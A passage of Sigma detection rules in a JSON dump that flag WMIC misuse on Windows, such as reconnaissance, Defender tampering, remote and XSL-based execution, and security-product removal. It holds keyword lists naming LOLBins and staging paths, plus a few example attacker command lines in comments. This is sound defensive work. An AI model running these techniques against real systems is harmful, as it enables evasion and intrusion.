    "content": "title: New ActiveScriptEventConsumer Created Via Wmic.EXE\nid: ebef4391-1a81-4761-a40a-1db446c0e625\nstatus: test\ndescription: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence\nreferences:\n    - https://twitter.com/johnlatwc/status/1408062131321270282?s=12\n    - https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-06-25\nmodified: 2023-02-14\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'ActiveScriptEventConsumer'\n            - ' CREATE '\n    condition: selection\nfalsepositives:\n    - Legitimate software creating script event consumers\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml",
    "content": "title: Potential Windows Defender Tampering Via Wmic.EXE\nid: 51cbac1e-eee3-4a90-b1b7-358efb81fa0a\nstatus: test\ndescription: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md\n    - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/\n    - https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/\nauthor: frack113\ndate: 2022-12-11\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1047\n    - attack.t1562\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_cli:\n        CommandLine|contains: '/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_process_creation.yml",
    "content": "title: New Process Created Via Wmic.EXE\nid: 526be59f-a573-4eea-b5f7-f0973207634d\nrelated:\n    - id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 # For suspicious process creation\n      type: derived\nstatus: test\ndescription: Detects new process creation using WMIC via the \"process call create\" flag\nreferences:\n    - https://www.sans.org/blog/wmic-for-incident-response/\n    - https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process\nauthor: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community\ndate: 2019-01-16\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\n    - car.2016-03-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'process'\n            - 'call'\n            - 'create'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_computersystem.yml",
    "content": "title: Computer System Reconnaissance Via Wmic.EXE\nid: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f\nstatus: test\ndescription: Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-08\nmodified: 2023-02-14\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1047\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: 'computersystem'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml",
    "content": "title: Hardware Model Reconnaissance Via Wmic.EXE\nid: 3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d\nstatus: test\ndescription: Detects the execution of WMIC with the \"csproduct\" flag, which is used to obtain information such as hardware models and vendor information\nreferences:\n    - https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/\n    - https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\n    - car.2016-03-002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: 'csproduct'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_group.yml",
    "content": "title: Local Groups Reconnaissance Via Wmic.EXE\nid: 164eda96-11b2-430b-85ff-6a265c15bf32\nstatus: test\ndescription: |\n    Detects the execution of \"wmic\" with the \"group\" flag.\n    Adversaries may attempt to find local system groups and permission settings.\n    The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\n    Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nauthor: frack113\ndate: 2021-12-12\nmodified: 2023-02-14\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: ' group'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_hotfix.yml",
    "content": "title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE\nid: dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45\nstatus: test\ndescription: Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts\nreferences:\n    - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat\n    - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_cli:\n        CommandLine|contains: ' qfe'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml",
    "content": "title: Process Reconnaissance Via Wmic.EXE\nid: 221b251a-357a-49a9-920a-271802777cc0\nstatus: test\ndescription: Detects the execution of \"wmic\" with the \"process\" flag, which an adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: frack113\ndate: 2022-01-01\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: 'process'\n    filter_main_creation:\n        CommandLine|contains|all:\n            # Rule id 526be59f-a573-4eea-b5f7-f0973207634d for `wmic process call create #{process_to_execute}`\n            - 'call'\n            - 'create'\n    condition: all of selection* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml",
    "content": "title: Potential Product Reconnaissance Via Wmic.EXE\nid: 15434e33-5027-4914-88d5-3d4145ec25a9\nstatus: test\ndescription: Detects the execution of WMIC in order to get a list of firewall and antivirus products\nreferences:\n    - https://thedfirreport.com/2023/03/06/2022-year-in-review/\n    - https://www.yeahhub.com/list-installed-programs-version-path-windows/\n    - https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product\nauthor: Nasreddine Bencherchali\ndate: 2023-02-14\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: 'Product'\n    filter_main_call_operations:\n        # wmic /node:\"#{node}\" product where \"name like '#{product}%%'\" call uninstall\n        CommandLine|contains:\n            - ' uninstall'\n            - ' install'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml",
    "content": "title: Potential Product Class Reconnaissance Via Wmic.EXE\nid: e568650b-5dcd-4658-8f34-ded0b1e13992\nstatus: test\ndescription: |\n    Detects the execution of WMIC in order to get a list of firewall, antivirus and antispyware products.\n    Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms.\n    This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.\nreferences:\n    - https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md\n    - https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1\n    - https://www.trendmicro.com/en_us/research/25/c/socgholishs-intrusion-techniques-facilitate-distribution-of-rans.html\nauthor: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2023-02-14\nmodified: 2025-03-17\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        # Example: wmic.exe /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List\n        CommandLine|contains:\n            - 'AntiVirusProduct'\n            - 'AntiSpywareProduct'\n            - 'FirewallProduct'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispyware products.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml",
    "content": "title: Service Reconnaissance Via Wmic.EXE\nid: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae\nrelated:\n    - id: 68bcd73b-37ef-49cb-95fc-edc809730be6\n      type: similar\nstatus: test\ndescription: |\n    An adversary might use WMI to check if a certain remote service is running on a remote device.\n    When the query completes, the service information will be displayed on the screen if the service exists.\n    A common feedback message is \"No instance(s) Available\" if the queried service is not running.\n    A common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains: 'service'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml",
    "content": "title: Uncommon System Information Discovery Via Wmic.EXE\nid: 9d5a1274-922a-49d0-87f3-8c653483b909\nrelated:\n    - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e\n      type: derived\nstatus: test\ndescription: |\n    Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\n    including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\n    and GPU driver products/versions.\n    Some of these commands were used by Aurora Stealer in late 2022/early 2023.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic\n    - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/\n    - https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar\n    - https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/\n    - https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/\n    - https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior\nauthor: TropChaud\ndate: 2023-01-26\nmodified: 2023-12-19\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_wmic:\n        - Description: 'WMI Commandline Utility'\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_commands:\n        CommandLine|contains:\n            - 'LOGICALDISK get Name,Size,FreeSpace'\n            - 'os get Caption,OSArchitecture,Version'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml",
    "content": "title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE\nid: 68bcd73b-37ef-49cb-95fc-edc809730be6\nrelated:\n    - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b # PowerShell Variant\n      type: similar\n    - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae\n      type: similar\nstatus: test\ndescription: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts\nreferences:\n    - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py\n    - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2023-09-11\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' service get '\n            - 'name,displayname,pathname,startmode'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_recon_volume.yml",
    "content": "title: System Disk And Volume Reconnaissance Via Wmic.EXE\nid: c79da740-5030-45ec-a2e0-479e824a562c\nrelated:\n    - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e\n      type: similar\nstatus: test\ndescription: |\n    An adversary might use WMI to discover information about the system, such as the volume name, size,\n    free space, and other disk information. This can be done using the 'wmic' command-line utility and has been\n    observed being used by threat actors such as Volt Typhoon.\nreferences:\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: Stephen Lincoln '@slincoln-aiq' (AttackIQ)\ndate: 2024-02-02\nmodified: 2025-10-20\ntags:\n    - attack.execution\n    - attack.discovery\n    - attack.t1047\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        - CommandLine|contains:\n              - ' volumename'\n              - ' logicaldisk'\n        - CommandLine|contains|all:\n              - 'path'\n              - 'win32_logicaldisk'\n        - CommandLine|contains|all:\n              - ' volume'\n              - ' list '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml",
    "content": "title: WMIC Remote Command Execution\nid: 7773b877-5abb-4a3e-b9c9-fd0369b59b00\nrelated:\n    - id: e42af9df-d90b-4306-b7fb-05c863847ebd\n      type: obsolete\n    - id: 09af397b-c5eb-4811-b2bb-08b3de464ebf\n      type: obsolete\nstatus: test\ndescription: Detects the execution of WMIC to query information on a remote system\nreferences:\n    - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-14\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|windash: '/node:'\n    filter_main_localhost:\n        CommandLine|contains:\n            - 'localhost'\n            - '127.0.0.1'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_service_manipulation.yml",
    "content": "title: Service Started/Stopped Via Wmic.EXE\nid: 0b7163dc-7eee-4960-af17-c0cd517f92da\nstatus: test\ndescription: Detects usage of wmic to start or stop a service\nreferences:\n    - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-20\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'wmic.exe'\n        - Image|endswith: '\\WMIC.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' service '\n            - ' call '\n        CommandLine|contains:\n            - 'stopservice'\n            - 'startservice'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml",
    "content": "title: Potential Remote SquiblyTwo Technique Execution\nid: 8d63dadf-b91b-4187-87b6-34a1114577ea\nrelated:\n    - id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32\n      type: similar\n    - id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d\n      type: similar\nstatus: test\ndescription: |\n    Detects potential execution of the SquiblyTwo technique that leverages Windows Management Instrumentation (WMI)\n    to execute malicious code remotely. This technique bypasses application whitelisting by using wmic.exe to process\n    malicious XSL (eXtensible Stylesheet Language) scripts that can contain embedded JScript or VBScript.\n    The attack typically works by fetching XSL content from a remote source (using HTTP/HTTPS) and executing it\n    with full trust privileges directly in memory, avoiding disk-based detection mechanisms. This is a common\n    LOLBin (Living Off The Land Binary) technique used for defense evasion and code execution.\nreferences:\n    - https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html\n    - https://twitter.com/mattifestation/status/986280382042595328 # Deleted\n    - https://atomicredteam.io/defense-evasion/T1220/\n    - https://lolbas-project.github.io/lolbas/Binaries/Wmic/\n    - https://x.com/byrne_emmy12099/status/1932346420226658668\nauthor: Markus Neis, Florian Roth, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2019-01-16\nmodified: 2026-01-24\ntags:\n    - attack.defense-evasion\n    - attack.t1047\n    - attack.t1220\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n        - Hashes|contains:  # Sysmon field hashes contains all types\n              - 'IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E'\n              - 'IMPHASH=37777A96245A3C74EB217308F3546F4C'\n              - 'IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206'\n              - 'IMPHASH=B12619881D79C3ACADF45E752A58554A'\n              - 'IMPHASH=16A48C3CABF98A9DC1BF02C07FE1EA00'\n    selection_cli:\n        CommandLine|contains|windash: '/format:'\n        CommandLine|contains:\n            - '://'\n            - '\\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_stdregprov_reg_modification.yml",
    "content": "title: Registry Manipulation via WMI Stdregprov\nid: c453ab7a-1f5c-4716-a3b4-dea8135fb43a\nstatus: experimental\ndescription: |\n    Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class.\n    This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe.\n    Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands.\nreferences:\n    - https://www.bitdefender.com/en-us/blog/businessinsights/shrinklocker-decryptor-from-friend-to-foe-and-back-again\n    - https://trustedsec.com/blog/command-line-underdog-wmic-in-action\n    - https://trustedsec.com/blog/wmi-for-script-kiddies\nauthor: Daniel Koifman (KoifSec)\ndate: 2025-07-30\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.t1047\n    - attack.t1112\n    - attack.t1012\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:   # Example command simulated:  WMIC  /NameSpace:\\\\root\\default Class StdRegProv Call CreateKey sSubKeyName=\"\"SOFTWARE\\Policies\\DeleteMe\"\"\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'call'\n            - 'stdregprov'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml",
    "content": "title: Suspicious WMIC Execution Via Office Process\nid: e1693bc8-7168-4eab-8718-cdcaa68a1738\nrelated:\n    - id: 438025f9-5856-4663-83f7-52f878a70a50\n      type: derived\n    - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a\n      type: obsolete\n    - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0\n      type: obsolete\n    - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5\n      type: obsolete\n    - id: 04f5363a-6bca-42ff-be70-0d28bf629ead\n      type: obsolete\nstatus: test\ndescription: Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: Vadim Khrykov, Cyb3rEng\ndate: 2021-08-23\nmodified: 2023-02-14\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\WINWORD.EXE'\n            - '\\EXCEL.EXE'\n            - '\\POWERPNT.exe'\n            - '\\MSPUB.exe'\n            - '\\VISIO.exe'\n            - '\\MSACCESS.EXE'\n            - '\\EQNEDT32.EXE'\n            - '\\ONENOTE.EXE'\n            - '\\wordpad.exe'\n            - '\\wordview.exe'\n    selection_wmic_img:\n        - Image|endswith: '\\wbem\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_wmic_cli:\n        CommandLine|contains|all:\n            - 'process'\n            - 'create'\n            - 'call'\n        CommandLine|contains:\n            # Add more suspicious LOLBINs as you see fit\n            - 'regsvr32'\n            - 'rundll32'\n            - 'msiexec'\n            - 'mshta'\n            - 'verclsid'\n            - 'wscript'\n            - 'cscript'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml",
    "content": "title: Suspicious Process Created Via Wmic.EXE\nid: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8\nrelated:\n    - id: 526be59f-a573-4eea-b5f7-f0973207634d # Generic\n      type: derived\nstatus: test\ndescription: Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsvr32\", etc.\nreferences:\n    - https://thedfirreport.com/2020/10/08/ryuks-return/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-12\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'process '\n            - 'call '\n            - 'create '\n        CommandLine|contains:\n            # Add more suspicious paths and binaries as you see fit in your env\n            - 'rundll32'\n            - 'bitsadmin'\n            - 'regsvr32'\n            - 'cmd.exe /c '\n            - 'cmd.exe /k '\n            - 'cmd.exe /r '\n            - 'cmd /c '\n            - 'cmd /k '\n            - 'cmd /r '\n            - 'powershell'\n            - 'pwsh'\n            - 'certutil'\n            - 'cscript'\n            - 'wscript'\n            - 'mshta'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - '\\AppData\\Local\\'\n            - '%temp%'\n            - '%tmp%'\n            - '%ProgramData%'\n            - '%appdata%'\n            - '%comspec%'\n            - '%localappdata%'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_terminate_application.yml",
    "content": "title: Application Terminated Via Wmic.EXE\nid: 49d9671b-0a0a-4c09-8280-d215bfd30662\nrelated:\n    - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products\n      type: derived\nstatus: test\ndescription: Detects calls to the \"terminate\" function via wmic in order to kill an application\nreferences:\n    - https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/\n    - https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-11\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'call'\n            - 'terminate'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_uninstall_application.yml",
    "content": "title: Application Removed Via Wmic.EXE\nid: b53317a0-8acf-4fd1-8de8-a5401e776b96\nrelated:\n    - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products\n      type: derived\nstatus: test\ndescription: Detects the removal or uninstallation of an application via \"Wmic.EXE\".\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic\nauthor: frack113\ndate: 2022-01-28\nmodified: 2024-07-02\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'call'\n            - 'uninstall'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml",
    "content": "title: Potential Tampering With Security Products Via WMIC\nid: 847d5ff3-8a31-4737-a970-aeae8fe21765\nrelated:\n    - id: b53317a0-8acf-4fd1-8de8-a5401e776b96 # Generic Uninstall\n      type: derived\nstatus: test\ndescription: Detects uninstallation or termination of security products using the WMIC utility\nreferences:\n    - https://twitter.com/cglyer/status/1355171195654709249\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\n    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\n    - https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-01-30\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cli_1:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'product where '\n            - 